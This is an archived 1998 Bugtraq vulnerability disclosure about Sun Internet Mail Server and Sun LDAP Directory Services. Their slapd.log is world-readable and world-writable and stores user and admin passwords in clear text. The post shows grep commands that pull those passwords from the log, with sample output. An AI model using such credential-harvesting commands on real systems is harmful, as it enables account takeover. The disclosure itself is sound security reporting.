home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / library / hack99 / sims-sds.txt < prev    next >
Encoding:
Internet Message Format  |  1999-03-24  |  1.1 KB
  1. Date: Fri, 25 Dec 1998 19:51:56 PST
  2. From: Dana Jones <britney_j@HOTMAIL.COM>
  3. Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
  4. To: BUGTRAQ@netspace.org
  5. Subject: Vulnerability
  6.  
  7. SIMS 3.x (Sun Internet Mail Server) and SDS 1.x & 3.1 (Sun LDAP
  8. Directory services) vulnerability.
  9.  
  10. /var/opt/SUNWconn/ldap/log/slapd.log  is used to log ldap
  11. connects/operations.
  12.  
  13. I won't waste a lot of typing on detailing the problem, perhaps this
  14. simple example will suffice:
  15.  
  16. % cd /var/opt/SUNWconn/ldap/log/
  17. % ls -l slapd.log
  18.  
  19. -rw-rw-rw-   1 root     root       33519 Dec 16 16:00 slapd.log
  20.  
  21. % grep password slapd.log
  22.  
  23. Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=Joe T. User
  24. (joet),OU=People,O=email,C=US" scope=2 filter="(userpassword=bettysue)"
  25.  
  26. % grep passwd | grep admin
  27.  
  28. Wed Dec 16 12:55 : conn=41 op=2 SRCH base="CN=admin
  29. (admin),OU=People,O=email,C=US" scope=2 filter="(userpassword=secret)"
  30.  
  31.  
  32. <sigh> yes folks, world readable (and writable for that matter) and
  33. clear text passwords and uids of all those folks logging into the IMAP
  34. server to check mail, etc. and on a machine that users can log into.
  35.  
  36. Almost takes all the fun out of it.
  37.